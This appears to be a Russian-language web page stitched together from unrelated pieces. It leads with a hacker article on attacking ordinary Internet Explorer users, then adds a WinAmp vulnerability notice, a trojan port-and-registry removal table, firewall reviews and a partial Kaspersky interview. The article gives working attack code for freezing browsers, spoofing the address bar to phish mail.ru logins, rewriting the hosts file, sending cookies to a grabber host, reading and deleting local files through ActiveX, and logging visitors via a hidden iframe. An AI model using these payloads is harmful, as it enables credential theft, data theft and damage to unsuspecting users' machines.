RSS

Компьютерная терминология    1_9  A  B  C  D  E  F  G  H  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  .....  A  Б  В  Г  Д  Ж  З  И  К  Л  М  Н  О  П  Р  С  Т  У  Ф  Х  Ц  Ч

Энциклопедия уязвимостей IE

   
0x1. Атаки DoS
0x2. Подделка значения адрессбара
0x3. Получение файлов cookie
0x4. Чтение локальной файловой системы
0x5. IEHK
0x7. Приложения
 Бесплатная консультация специалиста
Loading…
 

0x0. Введение
---- --------
Очень часто мы испытываем необходимость в получении доступа к необходимой информации, содержащейся не на каком-нибудь unix-сервере, уязвимом к новому эксплоиту в openssh, а у обычного рядового юзера internet, которые посещает странички, сидя в Internet Explorer под Windows 98. С ходу в голову приходит применение социальной инженерии. А что если он уже осекался на этом и теперь с улыбкой реагирует на все ваши попытки развода?? Вот взлому таких пользователей и посвящена эта статья. Все что нужно от него - это браузер IE и система Windows,плюс чуток заинтересованности в ваших словах. Все тесты я проводил в системе Win98SE с IE 6.0 без сервиспаков - судя по статистике посещений f0kp - эта связка используется большинством пользователей WWW.
От вас же требуется масса терпения и способности к _качественному_ креативу,также нужно умение общаться - иначе как вы убедите пользователя посетить вашу страничку?? Все остальное вы найдете в этой статье.

0x1. Атаки DoS
---- ---------
Цель: Для развлечения этот метод атаки не подходит - быстро надоедает, к тому же не так явно видны результаты. Использовать его можно и нужно для временного устранения оппонента из сети для проведения более интеллектуальной атаки или там для `поздравления подружки' путем отправки ей открытки с таким кодом. Это же можно использовать в качестве цели проведения атаки XSS в каком-либо крупном уязвимом форуме или где-либо еще. То же самое касается дефейсов - таким образом можно отвадить от посещения конкретного сайта большую часть аудитории, создать ему антирекламу.
1.1 Зависание IE.
Этот баг обнаружил Fabian Becker. Суть его состоит в том, что если в адресной строке IE набрать `C:\AUX', то это приведет к зависанию окна IE 6.0. Для устранения этого состояния необходимо прибить процесс IE [ при этом помимо повисшего окна закроются все остальные ]. Баг был протестирован автором в WinXP со всеми патчами и сервиспаками. Я тестировал его в Win2k prof, что дало аналогичный результат. В win98se браузер просто выводит список программ, чтобы вы выбрали из него ту, с помощью которой открывать этот файл. Однако если набрать ту же самую последовательность в Проводнике windows [ explorer.exe ], то это опять же приведет к зависанию. На практике это используется следующим образом.Вы создаете страничку примерно следующего вида <a href="C:\AUX">Click here</a> и заманиваете на нее вашу жертву, заставляя щелкнуть по ссылке. Разумеется, что пользователь может и западозрить неладное, а может ему лень куда-то щелкать..Тогда мы заставим его сделать это при помощи простейшего кода на JavaScript:
<script>
parent.location="file:///C:\\AUX";
</script>
Небольшое отступление для тех из вас, кто не знает, что такое AUX.
================================================================================
Итак в операционной системе ms-dos, которая лежит в основе windows, существует несколько зарезервированных словосочетаний:

CON - консоль
PRN - принтер
NUL - нулевое устройство [ аналог /dev/null в unix ]
AUX - асинхронный интерфейс
LPT[1-3] - параллельный порт(ы)
COM[1-4] - последовательный порт(ы)

По сути, это ничто иное как обычные файлы, но выполняющие более сложную роль;неправильное обращение с этими файлами устройств приводит к появлению BSOD'а или зависания системы [ в зависимости от ОС, области применения и наличия, либо отсутствия патчей к этой уязвимости ]. Именно поэтому система не позволит вам создать файл или директорию, в имени или расширении которых есть одно из этих слов. Однако отсутствие проверок в некоторых областях системы может привести к забавным результататам.
================================================================================
1.2 Смена цвета фона
Данный эксплоит обнаружен человеком по имени THR в далеком 1999 году. Эксплоит обходил новую методику, реализованную разработчиками Microsoft в новом тогда IE5, которая пресекала работу бесконечных циклов, приводящих к зависанию или замедлению работы системы. Как ни странно, но этот эксплоит успешно делает свое дело и в IE 6:
<HTML>
<BODY>
<SCRIPT>

var color = new Array;
color[1] = "black";
color[2] = "white";

for(x = 0; x <3; x++)
{
document.bgColor = color[x]
if(x == 2)
{
x = 0;
}
}

</SCRIPT>
</BODY>
</HTML>
1.3 Еще одна DoS
Нижеприведенный код работает во всех версиях Internet Explorer.
<html>
<input type>
<script>
(for i in all.document.tags)
</script>
</html>
Пожалуй, на этом остановимся и перейдем к более интересным уязвимостям браузера IE.
 
0x2. Подделка значения адрессбара
---- -------- -------- ----------
Данный метод позволяет нам установить произвольное значение в адресной строке браузера при посещении пользователем той или иной страницы. Скажем, пользователь реально ``находится'' на vasya_kewl.narod.ru, и в то же время в адресной строке браузера у него видно www.mail.ru
Понятно, что это открывает перед нами обширные возможности по получению каких угодно паролей от пользователя-жертвы. Вполне естесственно, что здесь нужно приложить по максимуму усилий, чтобы все выглядело натурально. Иными словами,если вы напишите что-то типа ``Это блин новый дезайн майл.ру. Ввидити свой пороль'', то вряд ли что у вас получится. Необходимо воссоздать полную копию нужного сайта с тем лишь исключением, что расположен он будет на подконтрольном вам сервере и что регистрационные данные, вводимые пользователем, будут сначала сохраняться в файл/высылаться по почте/icq, и лишь потом отправляться на реальный сервер mail.ru
Для этого воспользуемся недавним багом. Создайте страницу со следующим кодом:
<button onclick="location.href=unescape('http://www.mail.ru%01@hack.narod.ru');">
Check
</button>
При нажатии на кнопку, пользователю загрузится страница index.html с нашего сайта [ hack.narod.ru ], которая полностью имитирует главную страницу mail.ru.Теперь дело за малым, сохранить логин и пароль, введенные пользователем.
Основная проблема здесь, заставить пользователя нажать на эту кнопку - это уж ваша задача. Могу только сказать, что использовать именно кнопку совсем не обязательно.Вы можете сделать как обычную ссылку, так и автоматический редирект на вышеприведенный URL.
Конечно, вы можете сказать, что средствами javascript можно вообще выключить адрессбар, но это слишком заметно и подозрительно, равно как и первый пример для более-менее опытного пользователя. Самый сильный и надежный способ заключается в том, чтобы добавить в файл c:\windows\hosts запись вида:

YOUR_IP www.mail.ru

где вместо YOUR_IP будет прописан адрес IP подконтрольного вам web-сервера, на котором будет расположена точная копия сайта mail.ru. Проблема здесь только в том, чтобы удалить эту запись из системы жертвы после того как нужный вам акаунт будет получен.
Чтобы не грузить с примерами, возьмем пример из статьи ``Форматирование жесткого диска'', которую вы можете найти в этом же выпуске журнала.Немного изменяем код, и он делает то, что нам нужно. То есть, переменной f1 даем значение ``c:\\windows\\hosts'', а вместо команды format прописываем вышеприведенную
строку. В итоге получается что-то вроде этого:

var f1='c:\\windows\\hosts';

a.WriteLine("echo "213.231.98.24 www.mail.ru");

IP укажите тот, на котором у вас web-сервер с копией сайта mail.ru
 
0x3. Получение файлов cookie
---- --------- ------ ------
На самом деле, это тривиальная задача, поэтому особо здесь расписывать я эту тему не буду. Ключевым компонентом в этом деле является имеющийся в IE about: url - вот о нем и поговорим. К примеру, откройте окно браузера и введите в адресной строке что-то вроде:
about:<script>alert(document.cookie)</script>
Как ни странно, браузер проинтерпретирует этот код и выведет содержимое файла cookie текущего сайта. Поскольку мы ни на какой сайт не заходили, то содержимое появившегося окна будет пустым. Но если мы напишем что-то вроде
about://mail.ru<script>alert(document.cookie)</script>
и если перед этим вы посещали сайт mail.ru, то на экране будет отображено содержимое cookie mail.ru. Окей, это круто, конечно, но только какой от этого толк, ведь cookie отображаются в окне браузера самой жертвы. Поэтому мы сохраним полученные куки в переменную hacked_cook и отдадим нашему скрипту-грабберу:
hacked_cook=document.cookie;
hk=open("http://ebil_boxnet/grab?grb="+hacked_cook);
 
0x4. Чтение локальной файловой системы
---- ------ --------- -------- -------
Работа с файловой системой удаленного компьютера также не вызывает осложнений за счет наличия соответствующих багов. В последующих примерах все операции мы будем производить над файлом fuck.txt. В реальной ситуации, естесственно, вам нужно будет заменить это имя тем, которое нужно:
Читаем файлы:

<IFRAME name="I1" src="file://c:/fuck.txt"></IFRAME>

<script>
function f()
{
window.external.NavigateAndFind("javascript:alert(document.body.innerText);","ll","I1");
}
setTimeout("f()",2000);
</script>

Итак, что у нас здесь происходит?? Содержимое файла fuck.txt мы сохраняем в фрейм с именем I1, а потом выводим его содержимое. Вместо alert нужно воспользоваться функцией open, которой необходимо передать URL вашего сценария,который получит и сохранит текст этого файла с машины жертвы.
Удаляем файлы:

<script>
var fso = new ActiveXObject("Scripting.FileSystemObject");
fso.DeleteFile("C:\\fuck.txt");
</script>

Единственная проблема состоит в том, что при выполнении сценария IE показывает предупреждение о том, что, возможно, выполнение этого кода небезопасно. Как это вылечить смотрите в статье ``Форматирование жесткого диска''.

0x5. IEHK
---- ----
В настоящий момент существует не так уж и много способов выполнения произвольного кода в win98. Есть на эту тему один интересный проект, который называется IEHK - Internet Explorer Hacking Kit. Набор программ и примеров,использующих различные уязвимости IE. В частности полезен для конструирования
собственных эксплоитов, которые, в отличие от всяких PoC shit, присылаемых в BT,позволяют выполнять именно то что вы захотите, а не какой-нибудь там notepad.exe. Вот в нем и приведены различные примеры использования самых разных уязвимостей IE, в том числе OE [ outlook express использует ie для парсинга
писем, пришедших в формате html ].
0x7. Приложения
---- ----------

[1] Как узнать имя и версию браузера??
Для этого достаточно прочитать переменную HTTP_USER_AGENT, которая передается браузером в каждом HTTP-запросе. Это можно сделать на любом серверном языке сценариев [ perl, php, python ] и даже средствами JavaScript. В последнем случае вам придется передать полученные данные на какой-либо сторонний серверный сценарий для ее сохранения. Вот как подобное можно сделать при помощи DTML в Zope:

<dtml-sendmail mailhost="HackHost">

To: "hawkr@evilbox.net"
Subject: "my user-agent"

&REQUEST

</dtml-sendmail>

Этот код присылает на мой почтовый ящик весь запрос целиком. То есть помимо версии и имени браузера там будут и IP, адрес прокси, etc. Все что остается сделать это дать кому-нибудь ссылку на эту страничку, и код будет выполнен.Однако, давать ссылку напрямую не есть правильно, зачем лишний раз маячить своим
хостом перед глазами юзера. Регистрируем какую-нибудь неприметную страничку на narod.ru и выкладываем туда что-нибудь, при этом в нее следующий код:
<iframe style="width=1px; height=1px;" src="http://evilbox.net/user_agent">
При посещении этого вашего hack.narod.ru в странице незаметно [ за счет размеров фрейма ] произойдет вызов вашего сценария-граббера, а пользователь ни о чем и подозревать не будет.

[2] Как закодировать .exe в base64??
Для этого можно использовать, например, такой код на python:
import base64
from sys import argv

infile = argv[1]
outfile = argv[2]

base64.decode(open(infile, 'r'), open(outfile, 'w'))

Использовать так:
c:\> python bs64.py chervirus.exe out.txt

.:EOF:.


10.04.2004   Уязвимость в WinAmp

Модуль in_mod.dll содержит фрагмент кода, отвечающий за загрузку *.xm-файлов, который из-за некорректной проверки размеров буфера позволяет переписать произвольный фрагмент динамической памяти. Таким образом, появляется возможность подготовить такой mod-файл, при загрузке которого с веба и последующем проигрывании на пользовательской машине выполнится внедренный код с правами активного пользователя.Уязвимы версии 2.91-5.02 (возможно, и более старые), недавно вышедшая версия 5.03 уже исправлена. Приверженцам старых версий остается лишь удалить библиотеку in_mod.dll

2003


Дата Jan 11 2003      Здесь представлен список портов, а также потенциально опасных служб, относящихся к каждому из них, с приведением их файлов и вхождений в системный реестр Win, необходимых для удаления.
Помните о том, что после удаления файлов или правки реестра необходимо перезагрузить систему, для того чтобы убедиться в нормальной работе системы в целом и всех запущенных процессов в отдельности. Если вы удаляете некоторые параметры из системного реестра Windows, обязательно перезагрузите систему, перед тем как приступить к удалению связанных с ними файлов.

Порты 21, 5400-5402
¤Служба: Back Construction
Удаляемый параметр реестра:
HKEY_USERS\Default\Software\Microsoft\Windows\CurrentVersion\Run\(Ключ: Shell)
Удаляемый файл: \windows\Cmctl32.exe
¤Служба: Blade Runner
Удаляемый параметр реестра:
HKEY_USERS\Default\Software\Microsoft\Windows\CurrentVersion\Run\(Ключ:System-Tray)
Удаляемый файл: server.exe
¤Служба: Fore
Удаляемый файл: fore.exe
¤Служба: Invisible FTP
Удаляемый файл: ftp.exe

Порт 23
¤Служба: Tiny Telnet Server
Удаляемый параметр реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run Windll.exe = "C:\WINDOWS\Windll.exe"
Удаляемый файл: c:\windows\windll.exe

Порты 25, 110
¤Служба: Antigen
Удаляемый файл: antigen.exe
¤Служба: Email Password Sender
Удаляемый файл: winstart.bat, winstat.exe, priocol.exe, priocol.dll
¤Служба: Shtrilitz
Удаляемый параметр реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\(Ключ:Tspool)
Удаляемый файл: spool64.exe
¤Служба: Stealth
Удаляемый параметр реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ (Ключ: Win-protect System)
Удаляемый файл: winprotecte.exe
¤Служба: Tapiras
Удаляемый параметр реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\(Ключ: tapiras.exe)
Удаляемый файл: tapiras.exe
¤Служба: WinPC
Удаляемый файл: winpc.exe

Порты 41, 999, 2140, 3150, 6670-6771, 60 000
¤Служба: Deep Throat
Удаляемый параметр реестра:
HKEY_USERS\Default\Software\Microsoft\Windows\CurrentVersion\Run\(Ключ:Systemtray)
Удаляемые файлы: systray.exe, pddt.dat

Порты 79, 5321
¤Служба: Firehotker
Удаляемый файл: server.exe

Порт 80
¤Служба: Executor
Удаляемый файл: server.exe

Порт 113
¤Служба: Kazimas
Удаляемый файл: milbug_a.exe

Порт 121
¤Служба: JammerKillah
Удаляемый параметр реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices(Ключ:
MsWind32drv)

Удаляемый файл: MsWind32.drv

Порты 531,1045
¤Служба: Rasmin
Удаляемые файлы: rasmin.exe, wspool.exe, winsrvc.exe, inipx.exe, upgrade.exe

Порты 555, 9989
¤Служба: phAse Zero
Удаляемый параметр реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\(Ключ:MsgServ) Удаляемый файл: msgsvr32.exe

Порт 666
¤Служба: Attack FTP
Удаляемый параметр реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\(Ключ: Reminder)
Удаляемые файлы: wscan.exe, drwatsom.exe, serv-u.ini, results.dll, vwer.dll
¤Служба: Back Construction
Удаляемый параметр реестра:
HKEY_USERS\Default\Software\Microsoft\Windows\CurrentVersion\Run\(Ключ: Shell)
Удаляемый файл: cmctl32.exe
¤Служба: Cain & Abel
Удаляемый файл: abel.exe

Порты 1010-1015
¤Служба: Doly Trojan
Удаляемый параметр реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\фaйл tesk.exe
Удаляемый файл: tesk.exe

Порт 1042
¤Служба: BLA
Удаляемые параметры реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\System = "C:\ WINDOWS\System\mprdll.exe"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SystemDoor-"C:\ WINDOWS\System\rundll argp1"
Удаляемый файл: mprdll.exe

Порт 1234
¤Служба: UItors Trojan
Удаляемый файл: t5port.exe

Порты 1243, 6776
¤Служба: SubSeven
Удаляемые файлы: nodll.exe, server.exe, kernel16.dll, windows.exe, wtching.dll, lmdrk_33.dll

Порт 1245
¤Служба: VooDoo Dolt
Удаляемый файл: adm.exe

Порт 1492
¤Служба: FTP99CMP
Удаляемый параметр реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\(Ключ:WinDLL_16)
Удаляемые файлы: windll16.exe, serv-u.ini

Порт 1981
¤Служба: shockrave
Удаляемый параметр реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\(Ключ: Network Popup)
Удаляемый файл: netpopup.exe

Порт 1999О Служба: BackDoor
Удаляемый параметр реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\(Ключ:notpa)
Удаляемый файл: notpa.exe

Порты 1999-2005, 9878
¤Служба: Transmission Scout
Удаляемый параметр реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\(Ключ:kernel16) Удаляемый файл: kernel16.exe

Порт 2001
¤Служба: Trojan Cow
Удаляемый параметр реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\(Ключ:Sys-Window)
Удаляемый файл: syswindow.exe

Порт 2115
¤Служба: Bugs
Удаляемый параметр реестра:
HKEY_USERS\Default\Software\Microsoft\Windows\CurrentVersion\Run\(Ключ:Systray) Удаляемый файл: systemtr.exe

Порты 2140, 3150О Служба: The Invasor
Удаляемый параметр реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\(Ключ:Sys-
temDLL32)

Удаляемый файл: runme.exe

Порты 2155, 5512
¤Служба: Illusion Mailer
Удаляемый параметр реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\(Ключ:Sysmem) Удаляемый файл: memory.exe

Порт 2565
¤Служба: Striker
Удаляемый файл: servers.exe

Порт 2600
¤Служба: Digital RootBeer
Удаляемый параметр реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\(Ключ: ActiveX
Console)

Удаляемый файл: patch.exe

Порт 2989
¤Служба: RAT
Удаляемые параметры реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Explorer = "C:\ WINDOWS\Sybtem\MSGSVR16.EXE"
HKLMXSofbvareVMicrosoftWindowsVCurrentVersionXRunServicesXDefeult-" '' HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\Explorer-" "

Порты 3459-3801
¤Служба: Eclipse
Удаляемый параметр реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Rnaapp«"C:\ WINDOWS\System" (Ключ: rmaapp)
Удаляемый файл: rmaapp.exe

Порты 3700, 9872-9875, 10067,10167
¤Служба: Portal of Doom
Удаляемый параметр реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\(Ключ: String)
Удаляемые файлы: ljsgz.exe, server.exe

Порт 4567
¤Служба: File Nail
Удаляемый файл: server.exe

Порт 5000
¤Служба: Bubbel
Удаляемый параметр реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\(Ключ: Windows)
Удаляемый файл: bubbel.exe

Порты 5001, 30303, 50505
¤Служба: Sockets de Troie
Удаляемые параметры реестра:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunLoadMSchv32Drv - C:\WINDOWS\System\MSchv32.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunLoadMgadeskdll= C:\WINDOWS\System\ Mgadeskdll.exe
HKLM\Software\Microsoft\Windows\CurrentVersion\RunLoadRsrcload = C:\WINDOWS\Rsrcload.exe
HKLM\Software\Microsoft\Windows\CurrentVersion\RunLoadCsmctr32 = C:\WINDOWS\Csmctrl32.exe

Удаляемый файл: mschv32.exe

Порт 5569
¤Служба: Robo-Hack
Удаляемый файл: robo-serv.exe

Порт 6400
¤Служба: The tHing
Удаляемый параметр реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\(Ключ: Default)
Удаляемый файл: thing.exe

Порт 6912
¤Служба: Shit Heep
Удаляемый параметр реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\(Ключ: recyde-byn)
Удаляемые файлы: system.exe, update.exe

Порты 6969, 16969О Служба: Priority
Удаляемый параметр реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\(Ключ: Pserver)
Удаляемый файл: pserver.exe

Порт 6970
¤Служба: GateCrasher
Удаляемый параметр реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\(Ключ: Inet)
Удаляемый файл: system.exe

Порт 7000
¤Служба: Remote Grab
Удаляемый файл: mprexe.exe

Порт 9400
¤Служба: InCommand
Удаляемый файл: olemon32.exe

Порт 10 101
¤Служба: BrainSpy
Удаляемые параметры реестра: HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices — Dualji
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices — Gbubuzhnw
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices — Fexhqcux

Удаляемый файл: brainspy.exe

Порт 10 520
¤Служба: Acid Shivers
Удаляемые файлы: en-cid12.exe, en-cid12.dat

Порт 10 607О Служба: Coma
Удаляемый параметр реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\(Ключ:
Runtime)
Удаляемые файлы: msgsrv36.exe, server.exe

Порт 12 223
¤Служба: Hack'99 KeyLogger
Удаляемый параметр реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\(Ключ: HkeyLog)
Удаляемый файл: HkeyLog.exe

Порты 12 345-12 346
¤Служба: Netbus/2/Pro
Удаляемый параметр реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\(Ключ: Netbus)
Удаляемые файлы: sysedit.exe, patch.exe

Порты 20 000-20 001
¤Служба: Millennium
Удаляемый параметр реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\(Ключ: Millennium)
Удаляемый файл: hool.exe

Порт 21 544
¤Служба: Girlfriend
Удаляемый параметр реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\(Ключ: windll)
Удаляемый файл: windll.exe

Порты 22 222, 33 333
¤Служба: Prosiak
Удаляемый параметр реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\(Ключ: Microsoft DLL Loader)
Удаляемые файлы: windll32.exe, prosiak.exe

Порт 30 029
¤Служба: AOL Trojan
Удаляемый параметр реестра:
НKEY_LOCAL_MASHINE\Software\Microsoft\Windows\CurrentVersion\Run\ (Ключ: dat92003)
Удаляемый файл: dat92003.exe

Порты 30 100-30 102
¤Служба: Netsphere
Удаляемый параметр реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\(Ключ: nssx)
Удаляемый файл: nssx.exe

Порты 1349, 31 337-31 338, 54 320-54 321
¤Служба: Back Orifice
Удаляемый параметр реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\ (Ключ: bo)

Порты 31785-31792
¤Служба: Hack'a'Tack
Удаляемый параметр реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\(Ключ: Explorer32)
Удаляемый файл: expl32.exe

Порт 3 3911
¤Служба: Spirit
Удаляемый параметр реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\(Ключ: SystemTray)
Удаляемый файл: windown.exe

Порт 40 412
¤Служба: The Spy
Удаляемый параметр реестра:
HKLM\Software\Micrdsoft\Windows\CurrentVeraon\RunServices\(Ключ: Systray)
Удаляемый файл: systray.exe

Порт 47 262
¤Служба: Delta Source
Удаляемый параметр реестра:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\(Ключ: Ds admin tool)

Порт 65 000
¤Служба: Devil
Удаляемые файлы: opscript.exe, winamp34.exe, wingenocid.exe, icqflood.exe


Наблюдение за портами и их блокировка
Программы, предназначенные для наблюдения за портами и их блокировки, функционируют как мини-брандмауэры. Приставка «мини» в этом термине может быть интерпретирована не совсем правильно: здесь «мини» не означает, что подобные программы предлагают меньшую степень защиты, чем привычные брандмауэры. Она указывает на то, что этим термином обозначаются персональные механизмы защиты конечной системы. Мини-брандмауэры — это будущее систем защиты. По определению, брандмауэры функционируют как мосты между компьютерными сетями, защищающие каждую из них от несанкционированного доступа. Однако на сегодняшний день эти системы не могут обеспечить приемлемый уровень защиты.
Современные системы, в том числе и персональные компьютеры, содержат информацию, привлекающую хакеров, кракеров и других киберпанков. Брандмауэры можно рассматривать как основу, на которой строится защита системы, однако, к сожалению, хакерские атаки можно производить и при существовании подобных устройств в сети. Более того, атаки могут происходить и изнутри системы. Следовательно, применение брандмауэров — это только первый шаг к достижению должного уровня защищенности вашей системы. Необходимо закрыть все дыры не только снаружи, но и изнутри нее.
Эта задача решается программами наблюдения за портами и их блокировки, самые популярные из которых описаны ниже. Популярность их не в том, что они хорошо продаются или установлены на многих компьютерах, а в предлагаемом ими высоком уровне защиты. Описываемые утилиты защищают системы, ведя наблюдение за работой портов и блокируя все нежелательные соединения. Обычно такие программы работают через физические интерфейсы (сетевые платы, NIC) или через виртуальные интерфейсы, такие, как телефонные соединения.
Рассмотрим несколько программ защиты персональных систем.

Программа Blacklce Defender
Программа Blacklce Defender фирмы Network ICE (www.networkice.com) — это система защиты от хакеров, диагностирующая персональный компьютер по цифровой линии (DSL), кабельному модему или через простое телефонное соединение. Она призвана предупреждать пользователя о хакерских атаках. После обнаружения попытки несанкционированного доступа программа автоматически воспроизводит предупреждающий звук, после чего блокирует трафик, исходящий от того источника
Механизм предупреждения можно изменить: если получить доступ пытается доверенный источник, то такое соединение не блокируется. Однако
в этом случае потенциальную опасность представляют атаки хакеров, маскирующихся под доверенные источники, поэтому оптимальным методом защиты может оказаться блокирование портов. Другими недостатками Blacklce Defender являются: невозможность фильтрования входящего трафика на уровне приложений, малое количество правил управления доступом, а также недоработки в программе.
Если не учитывать вышеупомянутые недостатки, Blacklce Defender работает на должном уровне. Программа может создавать отчеты о несанкционированных атаках, а также хранить их историю. Встроенный механизм поиска собирает информацию о хакерских атаках, вычисляя их IP-, DNS- и МАС-адреса, а также сохраняя все данные, отправленные ими на ваш компьютер. Все попытки получения незаконного доступа квалифицируются программой по специальной шкале. Например, атаки, имеющие рейтинг 59 или ниже, обычно являются пробными атаками или попытками сканирования, производимыми в начальной стадии получения информации о системе. Атаки, получившие рейтинг выше 59, обычно производятся опытными хакерами и могут закончиться нежелательным проникновением в систему.
Компания Network ICE также предлагает новую разработку, называемую ICEPaq Security Suite. Этот пакет создан для защиты корпоративных сетей и поддерживает доступ через VPN. ICEPaq предлагает два решения: либо отдельный модуль программы устанавливается на каждом сервере в отдельности, либо управление осуществляется централизированно.
Продукты компании Network ICE подходят как для небольших компаний, так и для предприятий среднего класса и крупных корпораций.

Программа LockDown 2000
Программа LockDown 2000 (www.lockdown2000.com) предназначена для защиты системы. Она может осуществлять поиск троянских коней и отслеживать атаки, производимые при помощи ICQ или Nuke . Программа может удалить большое количество разнообразных троянских коней в вашей системе и восстановить после этого ее стабильную работу. Более того, программа LockDown 2000 отслеживает доступ ко всем совместно используемым ресурсам. Совсем недавно этот пакет считался одним из лучших среди приложений защиты.

Программа Norton Internet Security
Программа Norton Internet Security (www.norton.com) предлагает первоклассную защиту от хакерских атак. Пакет может противостоять таким удаленным атакам, как шторм запросов на обслуживание (атаки типа DoS), заражение вирусами, а также обеспечивает защиту от разрушительных компонентов Active-X, приложений Java и других. Программа Norton Internet Security также содержит новую технологию LiveUpdate, при помощи которой автоматически проверяет и загружает свежие базы вирусов из Интернета. Более того, вы можете выполнить настройку управления передачей для защиты личной информации от получения cookie. Имея такие богатые функциональные возможности, программа Norton Internet Security по праву считается одной из самых надежных систем защиты.
Интерфейс программы содержит множество настроек, что, однако, может оттолкнуть своей сложностью начинающего пользователя. Разработчики попытались дополнить управляющий интерфейс автоматической настройкой брандмауэра. Однако если пользователь будет не очень внимателен, то он может случайно
запретить и необходимые стандартные коммуникаций. Известно, что стабильность системы может измениться после установки полного комплекта программы, например могут происходить ее отказы, что исправляется только удалением пакета. Однако подобная проблема может возникать из-за несовместимости программ при одновременной работе Norton Internet Security с другими брандмауэрами.

Программа ZoneAlarm Pro
Программа ZoneAlarm Pro компании Zone Labs (www.zonelabs.com) — это еще один популярный защищающий демон, предназначенный для работы с доступом по телефонной линии, DSL, кабельному соединению и другим. Продукт блестяще справляется с защитой системы от несанкционированного доступа, в том числе от атак, произведенных по схеме «укрывания». Вы можете легко создавать правила безопасности для блокировки доступа через Интернет, разрешая при этом совместное использование ресурсов внутри сети. Все настройки производятся при помощи простого и интуитивно понятного интерфейса пользователя. Компания также предлагает бесплатную версию программы ZoneAlarm для защиты домашних компьютеров. Компания Zone Labs анонсирует следующие характеристики своей программы:
¤ парольная защита установок программы от копирования;
¤ настройка соединений с Интернетом и трансляции сетевых адресов при помощи одного нажатия клавиши мыши;
¤ специализированные утилиты, дающие возможность корпоративным пользователям настроить программу для специфических нужд защиты;
¤ выделение зоны IP-адресов, в которой можно осуществить блокировку сканирования портов;
¤ настройка способа оповещения программы о попытке взлома системы и управление записью атак;
¤ расширенные возможности контроля над использованием Интернета различными приложениями;
¤ модуль проверки вложений электронных сообщений MailSafe, умеющий определять и защищать систему от 37 подозрительных типов файлов.
С другой стороны, программа ZoneAlarm не имеет мощных средств конфигурирования, на которые рассчитывают опытные пользователи. Таким образом, можно сказать, что развитие этого продукта сейчас находится на начальном этапе.


28.06.2003         Интервью с Евгением Касперским.
За последние несколько месяцев произошло так много событий, взбудораживших всю мировую IT-общественность, что мы просто не могли не обратиться за комментариями к компетентным экспертам. Поразмыслите сами: "крестовый поход" червя Slammer, поставивший "на колени" добрую четверть всего Интернета, грядущий релиз Microsoft Office 2003 - продукта, который тесно поддерживает XML почти во всех своих приложениях и документах, новая версия червя Tanatos, высокотехнологичное распространение червя Sobig, многовекторный червь Fizzer, конференция АДЭ (Ассоциации Документальной Электросвязи) и много всего другого. В начале февраля пользователи и эксперты просто испугались, что эпидемии червей типа Slammer смогут повториться еще не раз. А заявление Microsoft о поддержке XML в Microsoft Office 2003 вызвало массу волнений: ведь снова может хлынуть лавина макровирусов. В дополнение к этим вопросам на повестку дня вынесена еще одна глобальная проблема: бреши в системе безопасности ПО. Именно они могут позволить вирусу заразить весь Интернет за 5 минут без вмешательства человека. И защиты от этой напасти пока не видно... За объяснениями мы обратились к руководителю антивирусных исследований "Лаборатории Касперского", Евгению Касперскому.
TanaT: Евгений, вы не могли бы немного прояснить ситуацию с бестелесными червями: в какой форме они существуют, каковы их принципы действия и на что они способны?
Евгений Касперский: Бестелесные черви впервые появились летом 2001 года, когда была зарегистрирована вспышка эпидемии печально известного CodeRed. Смысл этого типа вредоносных программ наглядно объясняется его названием. В отличие от "одноклассников", бестелесные черви в процессе заражения и распространения не используют ни временных, ни постоянных файлов. Они пробираются на компьютеры через бреши в системах безопасности и существуют исключительно в виде пакетов данных, передаваемых по коммуникационным каналам, или в виде программного кода в памяти зараженного компьютера.


Евгений Касперский, руководитель антивирусных исследований "Лаборатории Касперского"

TanaT: Много ли бестелесных червей существует на сегодняшний день?
Евгений Касперский: Парадоксально, но количество известных бестелесных червей абсолютно непропорционально уделяемому им вниманию, хотя и заслуженному. Известно всего лишь несколько модификаций CodeRed и недавно нашумевший, печально известный Slammer.
